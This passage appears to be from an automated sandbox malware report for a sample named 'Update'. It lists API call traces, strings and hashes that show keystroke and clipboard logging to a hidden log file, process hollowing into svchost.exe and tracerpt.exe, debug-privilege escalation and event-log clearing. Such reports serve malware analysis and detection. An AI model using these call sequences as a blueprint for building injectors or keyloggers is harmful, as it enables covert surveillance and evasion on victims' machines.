                                                                                                • wsprintfW.USER32 ref: 037FEB95
                                                                                                • wsprintfW.USER32 ref: 037FEBBF
                                                                                                • lstrlenW.KERNEL32(00000000), ref: 037FEC0B
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 037FEC21
                                                                                                • CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 037FEC3B
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FEC59
                                                                                                • lstrlenW.KERNEL32(00000000,?,00000000), ref: 037FEC69
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 037FEC74
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FEC7B
                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 037FEC88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                • API String ID: 1637302245-2373594894
                                                                                                • Opcode ID: dc3414975b50e04bd463ae95a635f4abae7db58d36d29782001149148cf587f5
                                                                                                • Instruction ID: 50f3e837268ae065b1a30b84a52a303fa64f5717417c718f0578f07cccaabee5
                                                                                                • Opcode Fuzzy Hash: dc3414975b50e04bd463ae95a635f4abae7db58d36d29782001149148cf587f5
                                                                                                • Instruction Fuzzy Hash: 7BC1BE70640700AFD770EF64DC88FAAB7B8FB48710F148AD9E25AD62A4D774A584CF61
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F7804
                                                                                                • _memset.LIBCMT ref: 037F7850
                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 037F7864
                                                                                                  • Part of subcall function 037F8720: _vswprintf_s.LIBCMT ref: 037F8731
                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7893
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037F78DA
                                                                                                  • Part of subcall function 037F7740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037F78FC), ref: 037F7756
                                                                                                  • Part of subcall function 037F7740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037F78FC,?,?,?,?,?,?,74DF0630), ref: 037F775D
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F790A
                                                                                                • _memset.LIBCMT ref: 037F7923
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F793B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F7944
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7956
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F7959
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F796B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F796E
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7980
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F7983
                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F798B
                                                                                                • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 037F7992
                                                                                                • _memset.LIBCMT ref: 037F79B4
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F79CA
                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037F79FF
                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 037F7A1B
                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 037F7A43
                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 037F7A58
                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,037F76F0,00001000,00000000), ref: 037F7A72
                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 037F7A90
                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 037F7AA1
                                                                                                • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F7ABA
                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 037F7AD6
                                                                                                • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 037F7AE8
                                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037F7AF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                • API String ID: 4176418925-3213446972
                                                                                                • Opcode ID: 7fd4576027911739c603c3ed4e53c6b3e1fae02f3937c8ece6a4e53b7f9c83c8
                                                                                                • Instruction ID: 1d507320e77eb91ed2e3e07697822d09a343c57d986db2dfef819c29e70f2062
                                                                                                • Opcode Fuzzy Hash: 7fd4576027911739c603c3ed4e53c6b3e1fae02f3937c8ece6a4e53b7f9c83c8
                                                                                                • Instruction Fuzzy Hash: F9819371A403187FD725EBA59C49FDB777CEB95B00F0005D8F708A6281EAB4AA84CB65
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 10005849
                                                                                                • _memset.LIBCMT ref: 10005868
                                                                                                • _memset.LIBCMT ref: 1000589D
                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 100058B1
                                                                                                  • Part of subcall function 100059E0: _vswprintf_s.LIBCMT ref: 100059F1
                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 100058E0
                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 10005928
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 1000594E
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005968
                                                                                                • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005987
                                                                                                • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059A2
                                                                                                • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                • API String ID: 2170139861-1986163084
                                                                                                • Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                • Instruction ID: 983fe607fc0b82aa02984a3f7cf9d741954c75fc9833714969104a2613b4b09b
                                                                                                • Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                • Instruction Fuzzy Hash: C8418EB0A00318EFE720CF60DC85FAA77B8EF48745F10859DF64D9B185DBB1AA848B54
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F7E73
                                                                                                • _memset.LIBCMT ref: 037F7E9F
                                                                                                • _memset.LIBCMT ref: 037F7ED4
                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 037F7EE8
                                                                                                  • Part of subcall function 037F8720: _vswprintf_s.LIBCMT ref: 037F8731
                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 037F7F15
                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 037F7F65
                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 037F7F92
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 037F7FAA
                                                                                                • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 037F7FCC
                                                                                                • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 037F7FEA
                                                                                                • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 037F7FFF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                • API String ID: 2170139861-2473635271
                                                                                                • Opcode ID: d07847b47380b56aa05c87c49bb70e67f9acfeb147d0410091aa4c804d47f509
                                                                                                • Instruction ID: 0152aa17c47fca7c00907e42708fcdc896468b98a735968a881bd7b65fa7564a
                                                                                                • Opcode Fuzzy Hash: d07847b47380b56aa05c87c49bb70e67f9acfeb147d0410091aa4c804d47f509
                                                                                                • Instruction Fuzzy Hash: F84172B5A00258AFDB24DB64DC85FDE77BCAB44700F0042D9E60DA6280EAB0AA85CF54
                                                                                                APIs
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,03820D80,74DEE010,74DF2FA0,74DF0F00,?,037F6028,?,?), ref: 037FE519
                                                                                                • lstrcatW.KERNEL32(03820D80,\DisplaySessionContainers.log,?,037F6028,?,?), ref: 037FE529
                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,03820D80,?,037F6028,?,?), ref: 037FE538
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,037F6028,?,?), ref: 037FE546
                                                                                                • CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000080,00000000,?,037F6028,?,?), ref: 037FE563
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,037F6028,?,?), ref: 037FE56E
                                                                                                • CloseHandle.KERNEL32(00000000,?,037F6028,?,?), ref: 037FE577
                                                                                                • DeleteFileW.KERNEL32(03820D80,?,037F6028,?,?), ref: 037FE58A
                                                                                                • ReleaseMutex.KERNEL32(00000000,?,037F6028,?,?), ref: 037FE597
                                                                                                • DirectInput8Create.DINPUT8(?,00000800,03814934,03821220,00000000,?,037F6028,?,?), ref: 037FE5B2
                                                                                                • GetTickCount.KERNEL32 ref: 037FE665
                                                                                                • GetKeyState.USER32(00000014), ref: 037FE672
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                • String ID: <$\DisplaySessionContainers.log
                                                                                                • API String ID: 1095970075-1170057892
                                                                                                • Opcode ID: 7f6b579da58a8c18fffa82ef2334eb81183525411d7a1f04d12664c02d9ced6d
                                                                                                • Instruction ID: a9db30a8f57dffd3de3bc2774624472a8c25c26b37fa9aacb5d7138795dccdfd
                                                                                                • Opcode Fuzzy Hash: 7f6b579da58a8c18fffa82ef2334eb81183525411d7a1f04d12664c02d9ced6d
                                                                                                • Instruction Fuzzy Hash: 75419AB0740605AFD750EFA8EC49F9E7BA8FB48700F208599F625DB394C675E4428B94
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,037FDFA4), ref: 037F7637
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037FDFA4), ref: 037F763E
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 037F765A
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7677
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F7681
                                                                                                • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,037FDFA4), ref: 037F7691
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 037F7698
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 037F76BA
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037F76C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                • API String ID: 1802016953-1577477132
                                                                                                • Opcode ID: 1f81fc4d77f8bd0f0262b6d7a57389042f4d66d304fa821c2acc3de6a8bd299f
                                                                                                • Instruction ID: c21a5b60860b74936bf784d83c7e9fdaedd1cdf10233ca61e85d59af9364b831
                                                                                                • Opcode Fuzzy Hash: 1f81fc4d77f8bd0f0262b6d7a57389042f4d66d304fa821c2acc3de6a8bd299f
                                                                                                • Instruction Fuzzy Hash: 9E214271A40308AFD710EBE4DC0AFBEB77CEB48710F404599FA15AA284DBB45944CBA5
                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03800576
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 0380058E
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0380059E
                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 038005AE
                                                                                                • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03800600
                                                                                                • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03800615
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                • API String ID: 3290314748-423161677
                                                                                                • Opcode ID: 472ba81ecf7deec5922b83ad3315f521c8c5f245e278ba4e75a0b1b1184d63c9
                                                                                                • Instruction ID: 96bdbfd3f18f72c36176c4d24632ff6a748152fdc7575c9e30879f9882f2012f
                                                                                                • Opcode Fuzzy Hash: 472ba81ecf7deec5922b83ad3315f521c8c5f245e278ba4e75a0b1b1184d63c9
                                                                                                • Instruction Fuzzy Hash: D131BFB2E40619AFDB60EBE4DC84AEEF7B9EB44744F1405A5E511F7180EB74AA04CB90
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
                                                                                                • GetLastError.KERNEL32 ref: 037F7BD2
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F7BE0
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F7BFB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3435690185-3733053543
                                                                                                • Opcode ID: 7208a66dc1e19bdf308d777c4ced7b9af0f0fcdb20e6082118d0ed2c318a5e1f
                                                                                                • Instruction ID: ae53a1f3d0806739642ece4e979f00cd67f28069d28ace650c1aad843bf48f27
                                                                                                • Opcode Fuzzy Hash: 7208a66dc1e19bdf308d777c4ced7b9af0f0fcdb20e6082118d0ed2c318a5e1f
                                                                                                • Instruction Fuzzy Hash: 77117B71B402189FD714EFB4DC59FAEB77CEB48700F404599FA0597284DA759901CB90
                                                                                                APIs
                                                                                                • OpenEventLogW.ADVAPI32(00000000,038158BC), ref: 037FB3E7
                                                                                                • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 037FB3F2
                                                                                                • CloseEventLog.ADVAPI32(00000000), ref: 037FB3F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$ClearCloseOpen
                                                                                                • String ID: Application$Security$System
                                                                                                • API String ID: 1391105993-2169399579
                                                                                                • Opcode ID: 2a26c06e6776069fd86e8af03b929219765fee5ba31f3b0b58ef0368cfa38ddb
                                                                                                • Instruction ID: d1de29eb1e9556d6b3ebc6d7616b9aad58931212232d6761cb33167acba5c9b8
                                                                                                • Opcode Fuzzy Hash: 2a26c06e6776069fd86e8af03b929219765fee5ba31f3b0b58ef0368cfa38ddb
                                                                                                • Instruction Fuzzy Hash: EEE022326057184BC221EF85E888B1FF3E8FFCD315F040A8DEA4896204C6B089098B9A
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E15DC
                                                                                                • memset.VCRUNTIME140(?,00000000,00000003), ref: 006E1602
                                                                                                • memset.VCRUNTIME140(?,00000000,00000050), ref: 006E168C
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 006E16A8
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E16C8
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 006E16D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 1045392073-0
                                                                                                • Opcode ID: 4fd6e582b43461b87c912dab2956d96b20761089326c4dcb866f6cac0d39bb14
                                                                                                • Instruction ID: 7713cc9e8a73024b1cfee2674073d00e36a8a5838dc55bd1ead6c8f713650dff
                                                                                                • Opcode Fuzzy Hash: 4fd6e582b43461b87c912dab2956d96b20761089326c4dcb866f6cac0d39bb14
                                                                                                • Instruction Fuzzy Hash: C0310975D063599BDB61DFA5D989BCCBBB9AF08700F10419AE409AB250EB705B84DF04
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,6CAB62A4,00000002,00000000,?,?,?,6CAB62A4,?,00000000), ref: 6CAB696C
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,20001004,6CAB62A4,00000002,00000000,?,?,?,6CAB62A4,?,00000000), ref: 6CAB6995
                                                                                                • GetACP.KERNEL32(?,?,6CAB62A4,?,00000000), ref: 6CAB69AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: f558711f51adbb22f16e817dc3bd865cdb2829620eb5f65f134834fffa841500
                                                                                                • Instruction ID: fde36951c8be286b6e6c55c079c1fb37aff74901bcc3cb4aee3243d7eedc306e
                                                                                                • Opcode Fuzzy Hash: f558711f51adbb22f16e817dc3bd865cdb2829620eb5f65f134834fffa841500
                                                                                                • Instruction Fuzzy Hash: E521A432704201A6E71C8F99C944B9777BEAF44B58B6E8524E909F7B04E732DEC1C350
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037F78FC), ref: 037F7756
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037F78FC,?,?,?,?,?,?,74DF0630), ref: 037F775D
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 037F7785
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 037F77B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeDebugPrivilege
                                                                                                • API String ID: 2349140579-2896544425
                                                                                                • Opcode ID: a1b1cc75e1917e428cfb0f20258482eb80edcc9e1224be6fe5fe84c97f3e2fcc
                                                                                                • Instruction ID: 4ee71cc3ab90b000916079b3a73c407fbcaf46267b7b5d79b36e322676d5be5a
                                                                                                • Opcode Fuzzy Hash: a1b1cc75e1917e428cfb0f20258482eb80edcc9e1224be6fe5fe84c97f3e2fcc
                                                                                                • Instruction Fuzzy Hash: 4A112571B5020CAFDB04DFE5DC59BAEB7B8FB48704F108599E605AB280DA759505CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAAA893: GetLastError.KERNEL32(?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAAA897
                                                                                                  • Part of subcall function 6CAAA893: SetLastError.KERNEL32(00000000,6CA81A6D,00000000), ref: 6CAAA939
                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 6CAB6276
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 6CAB62B4
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 6CAB62C7
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6CAB630F
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6CAB632A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 415426439-0
                                                                                                • Opcode ID: 432b794bf31d8d965d8087d38eac6c3e89c057afeb5d2d5fbc97662c7bef3531
                                                                                                • Instruction ID: 9f119734a165a48e9f304b7fe8d3ba46638315deeca327bf6186ce88f800d47a
                                                                                                • Opcode Fuzzy Hash: 432b794bf31d8d965d8087d38eac6c3e89c057afeb5d2d5fbc97662c7bef3531
                                                                                                • Instruction Fuzzy Hash: DD514F71A0160AABFF08DFA5CC44AEA77BCBF05704F184469E924F7640E771DA898B61
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0380131C
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03801331
